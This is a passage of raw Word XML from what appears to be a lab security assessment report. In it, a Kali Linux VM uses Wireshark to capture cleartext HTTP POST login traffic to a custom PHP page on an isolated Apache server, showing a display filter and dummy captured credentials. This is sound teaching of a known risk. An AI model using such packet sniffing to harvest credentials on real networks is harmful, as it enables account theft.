          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(OWASP Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6413D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC27488" w14:textId="77777777" w:rsidR="005040C1" w:rsidRDefault="005040C1" w:rsidP="00366109">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1278701F" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="005031E2" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005031E2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CDBA8C" wp14:editId="2454593B">
            <wp:extent cx="4739640" cy="2619728"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="149752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21584" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4747240" cy="2623929"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="613438B2" w14:textId="457D8ABA" w:rsidR="00D6413D" w:rsidRPr="005040C1" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan to find open ports 80 &amp; 3360</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFCD8E" w14:textId="5456FF5C" w:rsidR="00DA5128" w:rsidRPr="003F1732" w:rsidRDefault="00000000" w:rsidP="003F1732">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="59EE6C17">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_Toc228099274"/>
    </w:p>
    <w:p w14:paraId="60A9478D" w14:textId="682713B7" w:rsidR="001741D5" w:rsidRDefault="001741D5" w:rsidP="001741D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc231851427"/>
      <w:r w:rsidRPr="001741D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Traffic Capturing &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="001741D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="1ACAD470" w14:textId="0415B8E2" w:rsidR="00507BF9" w:rsidRDefault="00736545" w:rsidP="00736545">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The Kali Linux attacker VM made use of Wireshark to look at the items in the packets sent across the isolated NAT network, testing transport layer security when the authentication traffic is transmitted over an unencrypted channel</w:t>
      </w:r>
      <w:r w:rsidR="003F1732">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F1732" w:rsidRPr="003F1732">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. The scenario was only assessing credential leakage for cleartext network protocols. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1A151" w14:textId="58071A6E" w:rsidR="001E4EAC" w:rsidRDefault="00736545" w:rsidP="00736545">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>To show this risk, we used Nano to create a custom PHP login page (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) on the Ubuntu Apache server</w:t>
      </w:r>
      <w:r w:rsidR="0055421C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0055421C" w:rsidRPr="0055421C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(Apache Software Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E4EAC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Using Nano, a custom PHP login page (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) was created on the Ubuntu Apache server to demonstrate this risk. This landing page was hit through the Kali-Linux web browser with test credentials being entered manually to create active HTTP POST traffic</w:t>
      </w:r>
      <w:r w:rsidR="0055421C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0055421C" w:rsidRPr="0055421C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DD869" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00507BF9" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A29562" wp14:editId="40E07FEF">
            <wp:extent cx="5731510" cy="424180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="110711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19307" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="424180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099FCE4" w14:textId="01A5D69C" w:rsidR="00507BF9" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nano to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7D9E2" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="000B73F9" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EBE77F" wp14:editId="38D0F32F">
            <wp:extent cx="3703320" cy="2496508"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41334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42599" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18"/>
                    <a:srcRect l="5451" t="9785"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3723932" cy="2510403"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD821E" w14:textId="3B0D5285" w:rsidR="0056655E" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Credential Leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084EA63" w14:textId="70E862C2" w:rsidR="00C86D73" w:rsidRPr="0056655E" w:rsidRDefault="0056655E" w:rsidP="00736545">
      <w:r w:rsidRPr="009C7A6D">
        <w:t xml:space="preserve">The custom login page was successfully accessed from the Kali Linux browser using the Ubuntu target IP address and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C7A6D">
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C7A6D">
        <w:t xml:space="preserve"> endpoint hosted on Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48511B6C" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00C86D73" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3EEBFF" wp14:editId="6A73C77A">
            <wp:extent cx="4808220" cy="936000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7764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9977" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId19"/>
                    <a:srcRect r="288" b="53193"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4842787" cy="942729"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B94E7" w14:textId="2FB6B790" w:rsidR="0056655E" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08968214" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="0078371D" w:rsidP="0056655E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0C50F1" w14:textId="77777777" w:rsidR="003C14C1" w:rsidRDefault="003C14C1" w:rsidP="0056655E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B283193" w14:textId="3E3CE34F" w:rsidR="003C14C1" w:rsidRPr="0056655E" w:rsidRDefault="00000000" w:rsidP="0056655E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="084AF245">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C0BE3" w14:textId="1C1DBB3B" w:rsidR="0056655E" w:rsidRPr="003C14C1" w:rsidRDefault="0056655E" w:rsidP="00736545">
      <w:r w:rsidRPr="009C7A6D">
        <w:lastRenderedPageBreak/>
        <w:t>Test credentials were entered into the login form to generate HTTP POST traffic for packet analysis in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CE66D3" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00302285" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39FB87A0" wp14:editId="1477CECD">
            <wp:extent cx="4792980" cy="1499801"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="73261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14449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20"/>
                    <a:srcRect l="-1" r="155" b="21031"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4803501" cy="1503093"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7B7F7" w14:textId="7EA6D672" w:rsidR="005C37B9" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Login Page accessed via credential leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85EFF1" w14:textId="1B2922B4" w:rsidR="00736545" w:rsidRPr="00736545" w:rsidRDefault="00736545" w:rsidP="00736545">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The deployment was based on standard HTTP over Port 80, so the packets were totally exposed</w:t>
      </w:r>
      <w:r w:rsidR="00315405">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00315405" w:rsidRPr="00315405">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(Apache Software Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00736545">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. The following display filter was used to separate the authentication request from network noise on the back of the display:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49543F0F" w14:textId="7527A8DC" w:rsidR="00B93583" w:rsidRPr="00B93583" w:rsidRDefault="00B93583" w:rsidP="00736545">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B93583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B93583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>.method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B93583">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> == "POST"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0972FC9F" w14:textId="5BB1375E" w:rsidR="001070F5" w:rsidRDefault="001070F5" w:rsidP="001741D5">
      <w:r w:rsidRPr="001070F5">
        <w:t xml:space="preserve">The entire application interaction was recreated by performing Wireshark's </w:t>
      </w:r>
      <w:r w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Follow HTTP Stream"</w:t>
      </w:r>
      <w:r w:rsidRPr="001070F5">
        <w:t xml:space="preserve"> on the isolated POST frame</w:t>
      </w:r>
      <w:r w:rsidR="00315405">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00315405" w:rsidRPr="00315405">
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
      <w:r w:rsidRPr="001070F5">
        <w:t>. The communication was not encrypted, so the high privilege credentials were revealed in plain text in the transmission control stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62504FD0" w14:textId="3C4A4CD9" w:rsidR="001741D5" w:rsidRPr="00B73E90" w:rsidRDefault="00B73E90" w:rsidP="001741D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B73E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B73E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>admin&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B73E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>=password123</w:t>
      </w:r>
      <w:r w:rsidR="0015041B" w:rsidRPr="00B73E90">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637E7F6" w14:textId="3D8CC9A8" w:rsidR="001070F5" w:rsidRDefault="001070F5" w:rsidP="001741D5">
      <w:r w:rsidRPr="001070F5">
        <w:t>This technical assessment shows that it is possible to easily capture authentication credentials while running cleartext protocols without changing any system states on the local network segment by any malicious node</w:t>
      </w:r>
      <w:r w:rsidR="00315405">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00315405" w:rsidRPr="00315405">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="001070F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E7E80" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00914C46" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20BBCAE1" wp14:editId="501959C4">
            <wp:extent cx="4808220" cy="734604"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="6393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0597" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4847436" cy="740595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78E618" w14:textId="2F37FA47" w:rsidR="001741D5" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: POST Wireshark Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FFFCE" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00922F76" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F46F103" wp14:editId="75C5B985">
            <wp:extent cx="3139440" cy="2038471"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="73534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41367" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22"/>
                    <a:srcRect l="3009" r="3430" b="17975"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
